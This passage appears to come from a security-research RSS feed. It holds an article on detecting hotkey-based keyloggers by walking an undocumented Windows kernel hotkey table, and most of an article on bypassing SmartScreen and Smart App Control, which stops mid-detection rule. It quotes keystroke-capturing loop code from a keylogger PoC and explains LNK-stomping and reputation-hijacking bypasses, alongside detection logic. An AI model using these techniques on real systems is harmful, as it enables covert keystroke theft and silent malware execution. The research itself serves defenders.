<p>The detection tool (Hotkey-based Keylogger Detector) has been released below. Detailed usage instructions are provided as well. Additionally, this research was presented at <a href="https://nullcon.net/goa-2025/speaker-windows-keylogger-detection">NULLCON Goa 2025</a>, and the <a href="https://docs.google.com/presentation/d/1B0Gdfpo-ER2hPjDbP_NNoGZ8vXP6X1_BN7VZCqUgH8c/edit?usp=sharing">presentation slides</a> are available.</p>
<p><a href="https://github.com/AsuNa-jp/HotkeybasedKeyloggerDetector">https://github.com/AsuNa-jp/HotkeybasedKeyloggerDetector</a></p>
<p>The following is a demo video showcasing how the Hotkey-based Keylogger Detector detects Hotkeyz.</p>
<p><a href="https://drive.google.com/file/d/1koGLqA5cPlhL8C07MLg9VDD9-SW2FM9e/view?usp=drive_link">DEMO_VIDEO.mp4</a></p>
<h2>Acknowledgments</h2>
<p>We would like to express our heartfelt gratitude to Jonathan Bar Or for reading our previous article, sharing his insights on hotkey-based keyloggers, and generously publishing the PoC tool <strong>Hotkeyz</strong>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/Security Labs Images 12.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Detecting Hotkey-Based Keyloggers Using an Undocumented Kernel Data Structure]]></title>
            <link>https://www.elastic.co/kr/security-labs/detecting-hotkey-based-keyloggers-jp</link>
            <guid>detecting-hotkey-based-keyloggers-jp</guid>
            <pubDate>Tue, 04 Feb 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[In this article, we explore what hotkey-based keyloggers are and how to detect them. Specifically, we explain how these keyloggers intercept keystrokes, then present a detection technique that leverages an undocumented hotkey table in kernel space.]]></description>
<content:encoded><![CDATA[<h1>Detecting Hotkey-Based Keyloggers Using an Undocumented Kernel Data Structure</h1>
<p>In this article, we explore what hotkey-based keyloggers are and how to detect them. Specifically, we explain how these keyloggers intercept keystrokes, then present a detection technique that leverages an undocumented hotkey table in kernel space.</p>
<h2>Introduction</h2>
<p>In May 2024, Elastic Security Labs published <a href="https://www.elastic.co/kr/security-labs/protecting-your-devices-from-information-theft-keylogger-protection-jp">an article</a> introducing new features, added in <a href="https://www.elastic.co/kr/guide/en/integrations/current/endpoint.html">Elastic Defend</a> starting with version 8.12, that strengthen the detection of keyloggers running on Windows. We covered four types of keyloggers commonly used in cyberattacks - polling-based keyloggers, hooking-based keyloggers, keyloggers using the Raw Input Model, and keyloggers using DirectInput - and explained the detection methods we provide for them; in particular, we introduced a behavior-based detection method using the Microsoft-Windows-Win32k provider within <a href="https://learn.microsoft.com/ja-jp/windows-hardware/drivers/devtest/event-tracing-for-windows--etw-">Event Tracing for Windows</a> (ETW).</p>
<p>Shortly after publication, we were honored to have the article noticed by <a href="https://jonathanbaror.com/">Jonathan Bar Or</a>, Principal Security Researcher at Microsoft, who offered the valuable observation that hotkey-based keyloggers also exist and generously published PoC code for one. In this article, we use his hotkey-based keylogger PoC, <a href="https://github.com/yo-yo-yo-jbo/hotkeyz">Hotkeyz</a>, as a starting point to present one possible method for detecting this type of keylogger.</p>
<h2>Overview of Hotkey-based Keyloggers</h2>
<h3>What Is a Hotkey?</h3>
<p>Before discussing hotkey-based keyloggers, let's first clarify what a hotkey is. A hotkey is a type of keyboard shortcut: a key or combination of keys that directly invokes a specific function on a computer. For example, many Windows users press <strong>Alt + Tab</strong> to switch between tasks (windows). The <strong>Alt + Tab</strong> combination used here is a hotkey that directly invokes the task-switching function.</p>
<p><em>(Note: Keyboard shortcuts other than hotkeys exist, but they are outside the scope of this article. Also, everything described here is based on the environment the author used for testing - Windows 10 version 22H2 OS Build 19045.5371 without virtualization-based security. Please note that internal data structures and behavior may differ in other versions of Windows.)</em></p>
<h3>Abusing Custom Hotkey Registration Functionality</h3>
<p>Besides using the hotkeys preconfigured in Windows, as in the example above, you can also register hotkeys of your own. There are several ways to do this; one is the Windows API <a href="https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-registerhotkey">RegisterHotKey</a>, which registers a specified key as a hotkey. For example, the following code uses the <code>RegisterHotKey</code> API to register the A key (<a href="https://learn.microsoft.com/ja-jp/windows/win32/inputdev/virtual-key-codes">virtual-key code</a> 0x41) as a global hotkey.</p>
<pre><code class="language-c">/*
BOOL RegisterHotKey(
  [in, optional] HWND hWnd, 
  [in]           int  id,
  [in]           UINT fsModifiers,
  [in]           UINT vk
);
*/
RegisterHotKey(NULL, 1, 0, 0x41);
</code></pre>
<p>After registration, when the registered key is pressed, a <a href="https://learn.microsoft.com/ja-jp/windows/win32/inputdev/wm-hotkey">WM_HOTKEY message</a> is delivered to the <a href="https://learn.microsoft.com/ja-jp/windows/win32/winmsg/about-messages-and-message-queues">message queue</a> of the window specified in the first argument of the <code>RegisterHotKey</code> API (or of the thread that registered the hotkey, if NULL was specified). The following message-loop code uses the <a href="https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-getmessage">GetMessage</a> API to check whether a WM_HOTKEY message has arrived in the queue and, if so, extracts the virtual-key code it carries (0x41 in this case).</p>
<pre><code class="language-c">MSG msg = { 0 };
while (GetMessage(&amp;msg, NULL, 0, 0)) {
    if (msg.message == WM_HOTKEY) {
        int vkCode = HIWORD(msg.lParam);
        std::cout &lt;&lt; &quot;WM_HOTKEY received! Virtual-Key Code: 0x&quot;
            &lt;&lt; std::hex &lt;&lt; vkCode &lt;&lt; std::dec &lt;&lt; std::endl;
    }
}
</code></pre>
<p>In other words, when writing text in a notepad application, for example, input from the A key is no longer treated as a character - it is recognized as a global hotkey.</p>
<p>Here only the A key was registered as a hotkey, but multiple keys (B, C, D, and so on) can also be registered as individual hotkeys at the same time. This means that input from any key (virtual-key code) that can be registered through the <code>RegisterHotKey</code> API can be intercepted as a global hotkey, and hotkey-based keyloggers abuse this property to steal the keys a user types.<br />
In the author's testing, not only the alphanumeric and basic symbol keys but also all of those keys combined with the SHIFT modifier could be registered as hotkeys via the <code>RegisterHotKey</code> API. A keylogger can therefore monitor every key it needs to steal sensitive information.</p>
<h3>Capturing Keystrokes Stealthily</h3>
<p>Let's look at how a hotkey-based keylogger actually steals keys, using Hotkeyz as an example.<br />
Hotkeyz first registers the virtual-key code of each alphanumeric key, plus some additional keys (such as VK_SPACE and VK_RETURN), as individual hotkeys with the <code>RegisterHotKey</code> API. In its message loop it then uses the <a href="https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-peekmessagew">PeekMessageW</a> API to check whether a WM_HOTKEY message for a registered hotkey has arrived in the message queue. When one has, the virtual-key code contained in the message is extracted and eventually saved to a text file. Below is the message-loop code, excerpted to show the most important parts.</p>
<pre><code class="language-c">while (...)
{
    // Get the message in a non-blocking manner and poll if necessary
    if (!PeekMessageW(&amp;tMsg, NULL, WM_HOTKEY, WM_HOTKEY, PM_REMOVE))
    {
        Sleep(POLL_TIME_MILLIS);
        continue;
    }
....
   // Get the key from the message
   cCurrVk = (BYTE)((((DWORD)tMsg.lParam) &amp; 0xFFFF0000) &gt;&gt; 16);

   // Send the key to the OS and re-register
   (VOID)UnregisterHotKey(NULL, adwVkToIdMapping[cCurrVk]);
   keybd_event(cCurrVk, 0, 0, (ULONG_PTR)NULL);
   if (!RegisterHotKey(NULL, adwVkToIdMapping[cCurrVk], 0, cCurrVk))
   {
       adwVkToIdMapping[cCurrVk] = 0;
       DEBUG_MSG(L&quot;RegisterHotKey() failed for re-registration (cCurrVk=%lu,    LastError=%lu).&quot;, cCurrVk, GetLastError());
       goto lblCleanup;
   }
   // Write to the file
  if (!WriteFile(hFile, &amp;cCurrVk, sizeof(cCurrVk), &amp;cbBytesWritten, NULL))
  {
....
</code></pre>
<p>One point worth noting: to keep the user from noticing the keylogger, as soon as the virtual-key code is extracted from the message, the key's hotkey registration is temporarily removed with the <a href="https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-unregisterhotkey">UnregisterHotKey</a> API, and the key is then sent with <a href="https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-keybd_event">keybd_event</a>. To the user the key appears to have been typed normally, making it difficult to notice that keys are being stolen in the background. After the key is sent, it is registered as a hotkey again with the <code>RegisterHotKey</code> API, and the keylogger waits for the next input. That is how a hotkey-based keylogger works.</p>
<h2>Detecting Hotkey-Based Keyloggers</h2>
<p>Now that we understand what hotkey-based keyloggers are and how they work, let's discuss how to detect them.</p>
<h3>ETW Does Not Monitor the RegisterHotKey API</h3>
<p>As in our previous article, we first examined whether <a href="https://learn.microsoft.com/ja-jp/windows/win32/etw/about-event-tracing">Event Tracing for Windows</a> (ETW) could be used to detect hotkey-based keyloggers. It quickly became clear that ETW does not monitor the <code>RegisterHotKey</code> or <code>UnregisterHotKey</code> APIs. In addition to inspecting the manifest file of the Microsoft-Windows-Win32k provider, we reverse engineered the internals of the <code>RegisterHotKey</code> API (specifically <code>NtUserRegisterHotKey</code> in win32kfull.sys), but unfortunately found no evidence that these APIs emit ETW events when executed.<br />
The figure below compares the decompiled code of <code>GetAsyncKeyState</code> (<code>NtUserGetAsyncKeyState</code>), which ETW does monitor, with that of <code>NtUserRegisterHotKey</code>. At the beginning of <code>NtUserGetAsyncKeyState</code> there is a call to <code>EtwTraceGetAsyncKeyState</code>, a function tied to writing ETW events, while no such call exists in <code>NtUserRegisterHotKey</code>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image3.png" alt="Figure 1: Comparison of the decompiled code of NtUserGetAsyncKeyState and NtUserRegisterHotKey" /></p>
<p>We also considered using ETW providers other than Microsoft-Windows-Win32k to monitor <code>RegisterHotKey</code> API calls indirectly. However, the detection method introduced next - which uses the &quot;hotkey table&quot; and does not rely on ETW - proved as effective as, or more effective than, monitoring the <code>RegisterHotKey</code> API, so we ultimately adopted it.</p>
<h3>Detection Using the Hotkey Table (gphkHashTable)</h3>
<p>Once it was clear that ETW could not directly monitor <code>RegisterHotKey</code> calls, we looked for a detection method that does not rely on ETW. During that investigation we wondered: isn't the information about registered hotkeys stored somewhere in the first place, and if so, couldn't it be used for detection? Following that hypothesis, we quickly found a hash table labeled <code>gphkHashTable</code> inside <code>NtUserRegisterHotKey</code>. Searching Microsoft's public online documentation turned up nothing about <code>gphkHashTable</code>, so it appears to be an undocumented kernel data structure.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image1.png" alt="Figure 2: The hotkey table gphkHashTable, found in the RegisterHotKey function called from NtUserRegisterHotKey" /></p>
<p>Reverse engineering showed that this hash table stores objects describing each registered hotkey, and that each object holds the virtual-key code and modifiers passed as arguments to the <code>RegisterHotKey</code> API. The figure below shows part of the structure definition of the hotkey object (which we named <strong>HOT_KEY</strong>) on the right, and on the left a WinDbg session accessing <code>gphkHashTable</code> and inspecting a registered hotkey object.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image4.png" alt="Figure 3: Details of the hotkey object. WinDbg output (left) and the HOT_KEY structure" /></p>
<p>To summarize the reverse engineering results, <code>gphkHashTable</code> is laid out as shown in Figure 4. The index into the hash table is the virtual-key code specified in the <code>RegisterHotKey</code> API taken modulo 0x80. Hotkey objects that share an index are linked together in a linked list, so hotkeys with the same virtual-key code but different modifiers can still be stored and managed.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image6.png" alt="Figure 4: Structure of gphkHashTable" /></p>
<p>In other words, by walking every HOT_KEY object held in <code>gphkHashTable</code>, we can enumerate all registered hotkeys. If that enumeration shows that all of the primary keys (for example, every single alphanumeric key) are registered as individual hotkeys, it is strong evidence that a hotkey-based keylogger is running.</p>
<h2>Building the detection tool</h2>
<p>Next, we implemented the detection tool. Because <code>gphkHashTable</code> lives in kernel space, it cannot be reached from a user-mode application, so we decided to write a device driver. Specifically, the driver obtains the address of <code>gphkHashTable</code>, walks every object stored in the hash table, and reports that a hotkey-based keylogger may be present if the number of alphanumeric keys registered as hotkeys meets or exceeds a threshold.</p>
<h3>Obtaining the address of gphkHashTable</h3>
<p>The first challenge we faced was how to obtain the address of gphkHashTable. After some deliberation, we decided to extract it directly from an instruction that accesses gphkHashTable inside the memory space of <strong>win32kfull.sys</strong>.<br />
Reverse engineering revealed that a function named <code>IsHotKey</code> accesses gphkHashTable through a lea instruction (lea rbx, gphkHashTable) near the start of the function. We scan for that instruction using its opcode bytes (0x48, 0x8d, 0x1d) as a signature, then compute the address of gphkHashTable from the 32-bit (4-byte) offset that follows.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image5.png" alt="Figure 5: Inside the IsHotKey function" /></p>
<p>In addition, because IsHotKey is not an exported function, its address must also be obtained somehow. Further reverse engineering showed that IsHotKey is called from an exported function named <code>EditionIsHotKey</code>, so we compute the address of IsHotKey from EditionIsHotKey using the same signature-scanning technique. (As a side note, the base address of <strong>win32kfull.sys</strong> can be found by walking <code>PsLoadedModuleList</code>.)</p>
<h3>Accessing the memory space of win32kfull.sys</h3>
<p>Having settled on how to obtain the address of <strong>gphkHashTable</strong>, we started writing code that accesses the memory space of <strong>win32kfull.sys</strong> to retrieve it. The challenge here is that <strong>win32kfull.sys</strong> is a "session driver," so let's first briefly explain what a "session" is.<br />
In Windows, each user who logs in is generally assigned their own "session" (session number 1 and up). Roughly speaking, the first user to log in is assigned session 1; if another user then logs in, that user is assigned session 2. Each user gets their own desktop environment inside their own session.<br />
Kernel data that must be managed per session (that is, per logged-in user) is kept in "session space," a per-session, isolated region of kernel memory. The GUI objects managed by the win32k driver (windows, mouse and keyboard input, and so on) fall into this category, which is why screens and input are never mixed between users. (This is a deliberately rough overview; for more detail on sessions, we recommend James Forshaw's <a href="https://googleprojectzero.blogspot.com/2016/01/raising-dead.html">blog post</a>.)</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image2.png" alt="Figure 6: Session overview. Session 0 is dedicated to service processes" /><br />
Against this background, <strong>win32kfull.sys</strong> is called a "session driver." This means, for example, that hotkey information registered within the first logged-in user's session (session 1) can only be accessed from inside that same session. So how do we get there? In situations like this, <a href="https://learn.microsoft.com/ja-jp/windows-hardware/drivers/ddi/ntifs/nf-ntifs-kestackattachprocess">KeStackAttachProcess</a> is <a href="https://eversinc33.com/posts/kernel-mode-keylogging.html">known</a> to work.<br />
KeStackAttachProcess temporarily attaches the current thread to the address space of a specified process. If we attach to a GUI process in the target session, or more precisely a process that has loaded <strong>win32kfull.sys</strong>, we can access that session's <strong>win32kfull.sys</strong> and its data. Assuming a single logged-in user, we chose to locate and attach to <strong>winlogon.exe</strong>, the process responsible for each user's logon operations.</p>
<h3>Checking the registered hotkeys</h3>
<p>After attaching to the <strong>winlogon.exe</strong> process and locating the address of <strong>gphkHashTable</strong>, all that remains is to scan <strong>gphkHashTable</strong> and examine the registered hotkeys. An excerpt of that code follows.</p>
<pre><code class="language-c">BOOL CheckRegisteredHotKeys(_In_ const PVOID&amp; gphkHashTableAddr)
{
-[skip]-
    // Cast the gphkHashTable address to an array of pointers.
    PVOID* tableArray = static_cast&lt;PVOID*&gt;(gphkHashTableAddr);
    // Iterate through the hash table entries.
    for (USHORT j = 0; j &lt; 0x80; j++)
    {
        PVOID item = tableArray[j];
        PHOT_KEY hk = reinterpret_cast&lt;PHOT_KEY&gt;(item);
        if (hk)
        {
            CheckHotkeyNode(hk);
        }
    }
-[skip]-
}

VOID CheckHotkeyNode(_In_ const PHOT_KEY&amp; hk)
{
    if (MmIsAddressValid(hk-&gt;pNext)) {
        CheckHotkeyNode(hk-&gt;pNext);
    }

    // Check whether this is a single numeric hotkey.
    if ((hk-&gt;vk &gt;= 0x30) &amp;&amp; (hk-&gt;vk &lt;= 0x39) &amp;&amp; (hk-&gt;modifiers1 == 0))
    {
        KdPrint((&quot;[+] hk-&gt;id: %u hk-&gt;vk: %x\n&quot;, hk-&gt;id, hk-&gt;vk));
        hotkeyCounter++;
    }
    // Check whether this is a single alphabet hotkey.
    else if ((hk-&gt;vk &gt;= 0x41) &amp;&amp; (hk-&gt;vk &lt;= 0x5A) &amp;&amp; (hk-&gt;modifiers1 == 0))
    {
        KdPrint((&quot;[+] hk-&gt;id: %u hk-&gt;vk: %x\n&quot;, hk-&gt;id, hk-&gt;vk));
        hotkeyCounter++;
    }
-[skip]-
}
....
if (CheckRegisteredHotKeys(gphkHashTableAddr) &amp;&amp; hotkeyCounter &gt;= 36)
{
   detected = TRUE;
   goto Cleanup;
}
</code></pre>
<p>The code itself is straightforward: starting from the head of each hash table slot, it follows the linked list, visits every <strong>HOT_KEY</strong> object, and checks whether the registered hotkey is a single alphanumeric key. The detection tool raises an alert indicating a hotkey-based keylogger if every single alphanumeric key is registered as its own hotkey. For simplicity, this implementation only targets single alphanumeric-key hotkeys, but hotkeys with modifiers such as SHIFT could be checked just as easily.</p>
<h3>Detecting Hotkeyz</h3>
<p>We have published the detection tool (Hotkey-based Keylogger Detector) at the link below, along with usage instructions; please take a look if you are interested. We also presented this research at <a href="https://nullcon.net/goa-2025/speaker-windows-keylogger-detection">NULLCON Goa 2025</a>, and the <a href="https://docs.google.com/presentation/d/1B0Gdfpo-ER2hPjDbP_NNoGZ8vXP6X1_BN7VZCqUgH8c/edit?usp=sharing">presentation slides</a> are available as well.</p>
<p>*<a href="https://github.com/AsuNa-jp/HotkeybasedKeyloggerDetector">https://github.com/AsuNa-jp/HotkeybasedKeyloggerDetector</a></p>
<p>Finally, the demo video below shows the tool detecting Hotkeyz in action.</p>
<p><a href="https://drive.google.com/file/d/1koGLqA5cPlhL8C07MLg9VDD9-SW2FM9e/view?usp=drive_link">DEMO_VIDEO.mp4</a></p>
<h2>Acknowledgments</h2>
<p>Our sincere thanks go to Jonathan Bar Or, who read our <a href="https://www.elastic.co/kr/security-labs/protecting-your-devices-from-information-theft-keylogger-protection-jp">previous article</a>, told us about the hotkey-based keylogger technique, and went on to publish Hotkeyz as a proof of concept.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers-jp/Security Labs Images 12.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Dismantling Smart App Control]]></title>
            <link>https://www.elastic.co/kr/security-labs/dismantling-smart-app-control</link>
            <guid>dismantling-smart-app-control</guid>
            <pubDate>Tue, 06 Aug 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[This article will explore Windows Smart App Control and SmartScreen as a case study for researching bypasses to reputation-based systems, then demonstrate detections to cover those weaknesses.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Reputation-based protections like Elastic’s <a href="https://www.elastic.co/kr/guide/en/security/current/configure-endpoint-integration-policy.html#behavior-protection">reputation service</a> can significantly improve detection capabilities while maintaining low false positive rates. However, like any protection capability, weaknesses exist and bypasses are possible. Understanding these weaknesses allows defenders to focus their detection engineering on key coverage gaps. This article will explore Windows <a href="https://support.microsoft.com/en-us/topic/what-is-smart-app-control-285ea03d-fa88-4d56-882e-6698afdb7003">Smart App Control</a> and SmartScreen as a case study for researching bypasses to reputation-based systems, then demonstrate detections to cover those weaknesses.</p>
<h3>Key Takeaways:</h3>
<ul>
<li>Windows Smart App Control and SmartScreen have several design weaknesses that allow attackers to gain initial access with no security warnings or popups.</li>
<li>A bug in the handling of LNK files can also bypass these security controls.</li>
<li>Defenders should understand the limitations of these OS features and implement detections in their security stack to compensate.</li>
</ul>
<h2>SmartScreen/SAC Background</h2>
<p>Microsoft <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/virus-and-threat-protection/microsoft-defender-smartscreen/">SmartScreen</a> has been a built-in OS feature since Windows 8. It operates on files that have the <a href="https://learn.microsoft.com/en-us/microsoft-365-apps/security/internet-macros-blocked#mark-of-the-web-and-zones">“Mark of the Web”</a> (MotW) and are clicked on by users. Microsoft introduced Smart App Control (SAC) with the release of Windows 11. SAC is, in some ways, an evolution of SmartScreen. Microsoft <a href="https://support.microsoft.com/en-us/topic/what-is-smart-app-control-285ea03d-fa88-4d56-882e-6698afdb7003">says</a> it “adds significant protection from new and emerging threats by blocking apps that are malicious or untrusted.” It works by querying a Microsoft cloud service when applications are executed. If they are known to be safe, they are allowed to execute; however, if they are unknown, they will only be executed if they have a valid code signing signature. When SAC is enabled, it replaces and disables Defender SmartScreen.</p>
<p>Microsoft exposes undocumented APIs for querying the trust level of files for SmartScreen and Smart App Control. To help with this research, we developed a utility that will display the trust of a file. The source code for this utility is available <a href="https://github.com/joe-desimone/rep-research/blob/ea8c70d488a03b5f931efa37302128d9e7a33ac0/rep-check/rep-check.cpp">here</a>.</p>
<h2>Signed Malware</h2>
<p>One way to bypass Smart App Control is to simply sign malware with a code-signing certificate. Even before SAC, there has been a trend towards attackers signing their malware to evade detection. More recently, attackers have routinely obtained Extended Validation (EV) signing certificates. EV certs require proof of identity to gain access and can only exist on specially designed hardware tokens, making them difficult to steal. However, attackers have found ways to impersonate businesses and purchase these certificates. The threat group behind <a href="https://www.elastic.co/kr/security-labs/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant">SolarMarker</a> has leveraged <a href="https://squiblydoo.blog/2024/05/13/impostor-certs/">over 100</a> unique signing certificates across their campaigns. Certificate Authorities (CAs) should do more to crack down on abuse and minimize fraudulently-acquired certificates. More public research may be necessary to apply pressure on the CAs who are most often selling fraudulent certificates.</p>
<h2>Reputation Hijacking</h2>
<p>Reputation hijacking is a generic attack paradigm on reputation-based malware protection systems. It is analogous to the <a href="https://web.archive.org/web/20171028135605/https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/MattGraeber.CaseySmith.pdf">misplaced trust</a> research by Casey Smith and others against application control systems, as well as the <a href="https://i.blackhat.com/us-18/Thu-August-9/us-18-Desimone-Kernel-Mode-Threats-and-Practical-Defenses.pdf">vulnerable driver research</a> from Gabriel Landau and me. Unfortunately, the attack surface in this case is even larger. Reputation hijacking involves finding and repurposing apps with a good reputation to bypass the system. To work as an initial access vector, one constraint is that the application must be controlled without any command line parameters—for example, a script host that loads and executes a script at a predictable file path.</p>
<p>Script hosts are an ideal target for a reputation hijacking attack. This is especially true if they include a foreign function interface (FFI) capability. With FFI, attackers can easily load and execute arbitrary code and malware in memory. Through searches in VirusTotal and GitHub, we identified many script hosts that have a known good reputation and can be co-opted for full code execution. This includes Lua, Node.js, and AutoHotkey interpreters. A sample to demonstrate this technique is available <a href="https://github.com/joe-desimone/rep-research/blob/ea8c70d488a03b5f931efa37302128d9e7a33ac0/rep-hijacking/poc-rep-hijack-jam.zip">here</a>.</p>
<p>The following video demonstrates hijacking with the <a href="https://github.com/jamplus/jamplus">JamPlus</a> build utility to bypass Smart App Control with no security warnings:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/rep_hijacking-jamasync.gif" alt="" /></p>
<p>In another example, SmartScreen security warnings were bypassed by using a known AutoHotkey interpreter:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/smartscreen-bypass-ahk-calc.gif" alt="" /></p>
<p>Another avenue to hijack the reputation of a known application is to exploit it. This could be simple, like a classic buffer overflow from reading an INI file in a predictable path. It could be something more complex that chains off other primitives (like command execution/registry write/etc). Also, multiple known apps can be chained together to achieve full code execution. For example, one application that reads a configuration file and executes a command line parameter can then be used to launch another known application that requires a set of parameters to gain arbitrary code execution.</p>
<h2>Reputation Seeding</h2>
<p>Another attack on reputation protections is to seed attacker-controlled binaries into the system. If crafted carefully, these binaries can appear benign and achieve a good reputation while still being useful to attackers later. It could simply be a new script host binary, an application with a known vulnerability, or an application that has a useful primitive. On the other hand, it could be a binary that contains embedded malicious code but only activates after a certain date or environmental trigger.</p>
<p>Smart App Control appears vulnerable to seeding. After executing a sample on one machine, it received a good label after approximately 2 hours. We noted that basic anti-emulation techniques seemed to be a factor in receiving a benign verdict or reputation. Fortunately, SmartScreen appears to have a higher global prevalence bar before trusting an application. A sample that demonstrates this technique is available <a href="https://github.com/joe-desimone/rep-research/blob/ea8c70d488a03b5f931efa37302128d9e7a33ac0/rep-seeding/poc-rep-seeding.zip">here</a> and is demonstrated below:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/rephijack-primitive-seeding.gif" alt="" /></p>
<h2>Reputation Tampering</h2>
<p>A third attack class against reputation systems is reputation tampering. Normally, reputation systems use cryptographically secure hashing systems to make tampering infeasible. However, we noticed that certain modifications to a file did not seem to change the reputation for SAC. SAC may use fuzzy hashing or feature-based similarity comparisons in lieu of or in addition to standard file hashing. It may also leverage an ML model in the cloud to allow files that have a highly benign score (such as being very similar to known good). Surprisingly, some code sections could be modified without losing their associated reputation. Through trial and error, we could identify segments that could be safely tampered with and keep the same reputation. We crafted one <a href="https://github.com/joe-desimone/rep-research/blob/ea8c70d488a03b5f931efa37302128d9e7a33ac0/rep-tampering/poc-rep-tampering.zip">tampered binary</a> with a unique hash that had never been seen by Microsoft or SAC. This embedded an “execute calc” shellcode and could be executed with SAC in enforcement mode:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/reptamperingpopcalc.gif" alt="" /></p>
<h2>LNK Stomping</h2>
<p>When a user downloads a file, the browser will create an associated “Zone.Identifier” file in an <a href="https://www.digital-detective.net/forensic-analysis-of-zone-identifier-stream/">alternate data stream</a> known as the Mark of the Web (MotW). This lets other software (including AV and EDR) on the system know that the file is more risky. SmartScreen only scans files with the Mark of the Web. SAC completely blocks certain file types if they have it. This makes MotW bypasses an interesting research target, as it can usually lead to bypassing these security systems. Financially motivated threat groups have discovered and leveraged <a href="https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/">multiple vulnerabilities</a> to bypass MotW checks. These techniques involved appending crafted and invalid code signing signatures to javascript or MSI files.</p>
<p>During our research, we stumbled upon another MotW bypass that is trivial to exploit. It involves crafting LNK files that have non-standard target paths or internal structures. When clicked, these LNK files are modified by explorer.exe with the canonical formatting. This modification leads to removal of the MotW label before security checks are performed. The function that overwrites the LNK files is <strong>_SaveAsLink()</strong> as shown in the following call stack:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/image3.png" alt="" /></p>
<p>The function that performs the security check is <strong>CheckSmartScreen()</strong> as shown in the following call stack:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/image1.png" alt="" /></p>
<p>The easiest demonstration of this issue is to append a dot or space to the target executable path (e.g., <code>powershell.exe.</code>). Alternatively, one can create an LNK file that contains a relative path such as <code>.\target.exe</code>. After clicking the link, <code>explorer.exe</code> will search for and find the matching <code>.exe</code> name, automatically correct the full path, update the file on disk (removing MotW), and finally launch the target. Yet another variant involves crafting a multi-level path in a single entry of the LNK’s target path array. The target path array should normally have 1 entry per directory. The <a href="https://pypi.org/project/pylnk3/">pylnk3</a> utility shows the structure of an exploit LNK (non-canonical format) before and after execution (canonical format):</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/image4.png" alt="" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/image2.png" alt="" /></p>
<p>A Python script that demonstrates these techniques is available <a href="https://github.com/joe-desimone/rep-research/blob/8e22c587e727ce2e3ea1ccab973941b7dd2244fc/lnk_stomping/lnk_stomping.py">here</a>.</p>
<p>The following shows an LNK file bypassing MotW restrictions under Smart App Control to launch Powershell and pop calc:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/sac-lnk-powershell.gif" alt="" /></p>
<p>In another example, we show this technique chained with the Microsoft cdb command line debugger to achieve arbitrary code execution and execute shellcode to pop calc:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/sac-lnk-cdb.gif" alt="" /></p>
<p>We identified multiple samples in VirusTotal that exhibit the bug, demonstrating existing in-the-wild usage. The oldest <a href="https://www.virustotal.com/gui/file/11dadc71018027c7e005a70c306532e5ea7abdc389964cbc85cf3b79f97f6b44/detection">sample</a> identified was submitted over 6 years ago. We also disclosed details of the bug to the MSRC. It may be fixed in a future Windows update. We are releasing this information, along with detection logic and countermeasures, to help defenders identify this activity until a patch is available.</p>
<h2>Detections</h2>
<p>Reputation hijacking, by its nature, can be difficult to detect. Countless applications can be co-opted to carry out the technique. Cataloging and blocking applications known to be abused is an initial (and continual) step.</p>
<pre><code>process where process.parent.name == &quot;explorer.exe&quot; and process.hash.sha256 in (
&quot;ba35b8b4346b79b8bb4f97360025cb6befaf501b03149a3b5fef8f07bdf265c7&quot;, // AutoHotKey
&quot;4e213bd0a127f1bb24c4c0d971c2727097b04eed9c6e62a57110d168ccc3ba10&quot; // JamPlus
)
</code></pre>
<p>However, this approach will always lag behind attackers. A slightly more robust approach is to develop behavioral signatures to identify general categories of abused software. For example, we can look for common Lua or Node.js function names or modules in suspicious call stacks:</p>
<pre><code>sequence by process.entity_id with maxspan=1m
[library where
  (dll.Ext.relative_file_creation_time &lt;= 3600 or
   dll.Ext.relative_file_name_modify_time &lt;= 3600 or
   (dll.Ext.device.product_id : (&quot;Virtual DVD-ROM&quot;, &quot;Virtual Disk&quot;,&quot;USB *&quot;) and not dll.path : &quot;C:\\*&quot;)) and
   _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info: &quot;*!luaopen_*&quot;)] by dll.hash.sha256
[api where
